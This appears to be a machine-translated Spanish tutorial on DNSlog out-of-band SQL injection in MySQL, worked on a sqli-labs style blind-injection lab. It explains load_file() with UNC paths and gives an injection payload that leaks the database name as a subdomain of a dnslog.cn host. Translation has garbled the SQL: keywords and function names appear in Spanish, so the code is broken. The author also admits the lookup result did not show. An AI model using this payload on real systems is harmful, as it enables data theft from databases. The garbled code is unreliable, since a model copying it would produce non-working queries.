Tabla de contenido
En segundo lugar, el camino UNC
En tercer lugar, el sitio web que debe utilizarse
La inyección manual es de gran ayuda para eludir waf, pero la eficiencia es relativamente baja.
Las condiciones para la inyección manual de DNSlog son las mismas que para la inyección de carga de archivos, y mysql también necesita tener permisos de lectura y escritura para los archivos.
1. Funciones clave
cargar archivo()
Leer algunos archivos en esta máquina o compartidos en la red
En segundo lugar, el camino UNC
Formato: \nombreservidor\nombrecompartido, donde nombreservidor es el nombre del servidor y nombrecompartido es el nombre del recurso compartido.
En tercer lugar, el sitio web que debe utilizarse
http://www.dnslog.cn/
Obtenga un nombre de dominio asignado al azar:
Se puede acceder agregando algo al frente:
Luego hacemos clic en actualizar en dnslog para ver la información de registro de la resolución de dns:
Cuatro, inyectar
En pocas palabras, su principio es que antes de que el DNS resuelva el nombre de dominio, ahora ejecuta el comando de la base de datos que quiero que ejecute.
Aquí tomamos el tiempo ciego menos-9 como ejemplo:
?id=1 y (seleccione load_file(concat("//",(seleccione base de datos()),".snen4t.dnslog.cn//hyc.txt")))
Puede ver que la página no responde, pero verifique los registros en dnslog:
De hecho, mostrará que la base de datos es seguridad frente al nombre de dominio, pero no sé por qué no se muestra, pongámoslo aquí primero...
